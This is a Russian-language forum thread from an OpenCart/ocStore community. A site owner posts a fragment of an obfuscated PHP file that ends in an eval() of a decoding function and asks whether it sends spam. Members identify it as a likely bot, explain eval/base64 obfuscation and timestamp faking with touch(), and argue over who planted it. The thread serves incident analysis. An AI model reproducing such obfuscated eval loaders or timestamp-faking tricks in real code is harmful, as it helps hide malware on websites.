Перейти к содержанию

Рекомендуемые сообщения

есть файл во вложении, внутри

 'B', '0'=>'f', '3'=>'2', '2'=>'u', '5'=>'p', '4'=>'c', '7'=>'5', '6'=>'R', '9'=>'d', '8'=>'8', 'A'=>'V', 'C'=>'t', 'B'=>'E', 'E'=>'M', 'D'=>'x', 'G'=>'l', 'F'=>'1', 'I'=>'G', 'H'=>'r', 'K'=>'3', 'J'=>'A', 'M'=>'4', 'L'=>'6', 'O'=>'v', 'N'=>'m', 'Q'=>'H', 'P'=>'z', 'S'=>'b', 'R'=>'U', 'U'=>'s', 'T'=>'J', 'W'=>'O', 'V'=>'W', 'Y'=>'I', 'X'=>'k', 'Z'=>'7', 'a'=>'S', 'c'=>'Z', 'b'=>'Y', 'e'=>'Q', 'd'=>'L', 'g'=>'D', 'f'=>'w', 'i'=>'T', 'h'=>'P', 'k'=>'q', 'j'=>'o', 'm'=>'n', 'l'=>'9', 'o'=>'j', 'n'=>'X', 'q'=>'i', 'p'=>'e', 's'=>'F', 'r'=>'g', 'u'=>'N', 't'=>'K', 'w'=>'0', 'v'=>'C', 'y'=>'y', 'x'=>'a', 'z'=>'h'); eval/*mnfldqnd*/(ujmkbvoru($nhlglmduev, $clwksr));?>

 

может эта фигня рассылать спам рассылку? 

также скрин с панели управления

view79.php

spam.png

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Да, может в принципе, но надо детально смотреть

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

eval

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
25 минут назад, n3bo сказал:

eval

это ?

самый распространенный случай исполнения вредоносного кода. Подобная структура файла обозначает, что в файле содержится вирусная сигнатура, которая исполняется посредством функции php eval() и декодируется через base64. Сочетание функции eval(base64_decode самое распространенное во вредоносных скриптах, так как она позволяет исполнять вредоносный код, который находится в закодированном виде, тем самым затрудняя анализ когда

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Обратитесь к halfhope, он занимается подобным. Дорого, но с гарантией делает.

Вам недостаточно сейчас удалить файл и поправить что-либо, Вам нужно найти дыру, через которую это попало к Вам, т.к. почистив все - завтра опять может повториться.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

мне не надо его удалять, закрывать, править..

Мне нужно знать когда он появился( день, месяц, год) и залит был с опенкартом, шаблоном или позже.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

то что вы хотите это рыть логи, думать, анализировать. нужен опытный сисадмин. очень опытный. как минимум halftope

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

написал Талгату, пока молчит.

Я не с того начал - ситуация следующая ,этот домен( хостинг) создан для тестирования настроек и для тестовых заданий для новичков с форума.

Мне не надо это исправлять, мне нужно знать кто.

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
1 час назад, vasilev86 сказал:

Мне нужно знать когда он появился

у вас на скринах даты изменения файлов указаны

 

39 минут назад, vasilev86 сказал:

мне нужно знать кто

для этого нужно изучать логи (как вариант - отталкиваясь от даты изменения)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

даты я видел, но мне надо на 100 % быть уверенным что это именно этот файл.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Спасибо всем кто откликнулся, не удалось выяснить кто закинул вирусы.

Замечу от себя, установкой ocStore и Шаблон "Magazin" для ocStore/Opencart  в этот период времени занимался Валерий - kvr66

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
4 минуты назад, vasilev86 сказал:

Спасибо всем кто откликнулся, не удалось выяснить кто закинул вирусы.

 

Ну.. не думаю что кто у нас с форума будет заниматься такой ...
Репутация дороже денег
Скорее всего сломали хостера или соседей или ... поставили условно - бесплатный модуль (shareware), где скорее всего в лицензии было написано, что они "имеют право" рассылать "спам" в обмен на "использование" модуля. Сейчас очень много "вирусов" (под windows и т п) используют такую тактику и антивирусы не имеют право даже удалять их (лицензионное соглашение на использование "программы"). Т .е. типа программа "декодер" а в условиях лицензионного соглашения написано на 100500 странице что используя его вы разрешаете использовать свой компьютер в любых целях. :ugeek:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Надеюсь на это, но хост работает с 23.02.2016 куплен домен, куплен дополнительная лицензия на шаблон + дополнительная лицензия на обмен 1с и я своими прямыми руками там игрался.

01.03.2017 было все снесено и установлен ocStore и Шаблон "Magazin" для ocStore/Opencart .

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
41 минуту назад, vasilev86 сказал:

Надеюсь на это, но хост работает с 23.02.2016 куплен домен, куплен дополнительная лицензия на шаблон + дополнительная лицензия на обмен 1с и я своими прямыми руками там игрался.

01.03.2017 было все снесено и установлен ocStore и Шаблон "Magazin" для ocStore/Opencart .

 

Я не сомневаюсь в вашей порядочности. Может установили какой бесплатный модуль (я писал чем на само деле он может оказаться)
Да и платных хватает с дырами. К примеру всем популярным модулям (на маркетплейсе opencart.com) отзывов с возможностью загрузки изображений я (при свидетелях, кстати с форума, ссылки на шеллы я им сразу показывал на серверах) загрузил шеллы (php бомбы) на их демки, почти всем.   И я не профи хакер, а обычный разработчик. Я представляю что могут сделать профи хакеры

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
15 минут назад, markimax сказал:

 

Я не сомневаюсь в вашей порядочности. Может установили какой бесплатный модуль (я писал чем на само деле он может оказаться)
Да и платных хватает с дырами. К примеру всем популярным модулям (на маркетплейсе opencart.com) отзывов с возможностью загрузки изображений я (при свидетелях, кстати с форума, ссылки на шеллы я им сразу показывал на серверах) загрузил шеллы (php бомбы) на их демки, почти всем.   И я не профи хакер, а обычный разработчик. Я представляю что могут сделать профи хакеры

Бесплатного модуля не было. 

ТЗ было установить ocstore и шаблон, что и было сделано.

Все что я смог проверить и сравнить сам, это время создания системных файлов и файлов с вирусами, совпадение до секунды.

Значит все это было загружено разом.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
5 часов назад, vasilev86 сказал:

Бесплатного модуля не было. 

ТЗ было установить ocstore и шаблон, что и было сделано.

Все что я смог проверить и сравнить сам, это время создания системных файлов и файлов с вирусами, совпадение до секунды.

Значит все это было загружено разом.

 

Учим матчасть http://php.net/manual/ru/function.touch.php

Удивляемся, хватаем себя за лицо. Как просто оказывается поменять дату создания у файла. Ну а скопировать ее с index.php - это совсем совсем просто.
Скрипты ботнетов научились такое делать давным давно.

 

Выше приведенная вами сигнатура - это на 99.9% бот.

И вскочил он к вам не через фтп, а через admin/admin ну или еще что вы там "прямыми руками" у себя намудрили.

 

Так что заканчивайте тут брызгать ядом в силу своей некомпетенции и "намекать" бездоказательно на кого бы то ни было.

Если у вас есть пруф с логом ftp где есть дата заливки именно этого файла с конкретного айпи. Вопросов нет
Нету - тогда похоже вы сами побаловались варезятинкой, а теперь ищете крайних.

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Учитывая репутацию ТС даже как-то не удивлён... Рано или поздно это должно было случиться, и случится ещё не раз...

 

Работа должна нормально оплачиваться. Если она не оплачивается нормально деньгами, она оплачивается вот таким образом: спам-росылки, шеллы и т.д, то бишь ресурсами сайта....

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
14 часов назад, snastik сказал:

 

Учим матчасть http://php.net/manual/ru/function.touch.php

Удивляемся, хватаем себя за лицо. Как просто оказывается поменять дату создания у файла. Ну а скопировать ее с index.php - это совсем совсем просто.
Скрипты ботнетов научились такое делать давным давно.

 

Выше приведенная вами сигнатура - это на 99.9% бот.

И вскочил он к вам не через фтп, а через admin/admin ну или еще что вы там "прямыми руками" у себя намудрили.

 

Так что заканчивайте тут брызгать ядом в силу своей некомпетенции и "намекать" бездоказательно на кого бы то ни было.

Если у вас есть пруф с логом ftp где есть дата заливки именно этого файла с конкретного айпи. Вопросов нет
Нету - тогда похоже вы сами побаловались варезятинкой, а теперь ищете крайних.

Спасибо, буду знать, я действительно этого не знал.

логи из панели управления исчезли,они были 100%, при первой рассылки я их видел, файлы изменены на view79.php.virus

[2017-03-13 20:18:07] logged
[2017-02-25 19:15:11] logged 

запрос поддержки тоже результата не дал.

Максим Владимирович 11.04.17 22:34

Здравствуйте

К сожалению нет.
Лог файлов за 1-го число у нас нет.
Для хранения лог файлов необходимо активировать такую функцию в настройках домена - панель хостинга - Домены, напротив домена кнопка Настройки.

 

Валерия я указал для того, чтобы подтвердить что этим занимался не абы кто.

 

Цитата

 

Все что я смог проверить и сравнить сам, это время создания системных файлов и файлов с вирусами, совпадение до секунды.

Значит все это было загружено разом.

 

 

эти выводы я сделал по советам выше 

 

Цитата

у вас на скринах даты изменения файлов указаны

 

По поводу модулей с вареза

Я установил только SQL Query Time Log от Oтвета и все. 10.03.2107

Так он там и болтается.

 

06.03.2017 появился Local copy OCMOD by iSenseLabs, я не знаю что за модуль, но 10.03 его вроде не было, хотя я и не смотрел, т.к в админку практически не заходил.

 

 JohnnyVega

10 часов назад, JohnnyVega сказал:

Учитывая репутацию ТС даже как-то не удивлён... Рано или поздно это должно было случиться, и случится ещё не раз...

 

Работа должна нормально оплачиваться. Если она не оплачивается нормально деньгами, она оплачивается вот таким образом: спам-росылки, шеллы и т.д, то бишь ресурсами сайта....

Покажите хоть одного человека( исполнителя) которому я не заплатил ? или не доплатил ?  

Да, я не могу себе позволить работать с супер пупер программистами за $ 30  за правку , для меня это дорого.

 

Скорое всего  спамом не закончилось т.к потом пошли боты на основной сайт, где  AWARO , как JohnnyVega пытался делать выводы в сторону не доплаты, ребята это смешно.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
34 минуты назад, vasilev86 сказал:

 

  11.04.17 22:34

 

 

06.03.2017 появился Local copy OCMOD by iSenseLabs, я не знаю что за модуль, но 10.03 его вроде не было, хотя я и не смотрел

 

 

Это дополнение для обхода загрузки через  FTP

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
42 минуты назад, vasilev86 сказал:

По поводу модулей с вареза

Я установил только SQL Query Time Log от Oтвета и все. 10.03.2107

Так он там и болтается.

 

 

Скорое всего  спамом не закончилось т.к потом пошли боты на основной сайт, где  AWARO , как JohnnyVega пытался делать выводы в сторону не доплаты, ребята это смешно.

 

Установите кассовый апарат тож с вареза))
по поводу выводов - это стёб - на ваше *модули по триста - это дорого а развод от государства на всякие кассовые апараты в виде калькулятора 50х за 5 - 10к это норм*
улыбнитесь уже бедолага. спасибо что показали наконец кто вы есть.

к стати аваторы часто (не всегда) отражают юзеров в жизни)) подсознательный выбор называется)

photo-706311.gif

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
1 минуту назад, vilka сказал:

 

Это дополнение для обхода загрузки через  FTP

спасибо, только что нашел информацию об этом дополнении, но зачем? если я доступы без проблем давал..

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Только что, vasilev86 сказал:

спасибо, только что нашел информацию об этом дополнении, но зачем? если я доступы без проблем давал..

для загрузки \ установки файлов без настроек FTP

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.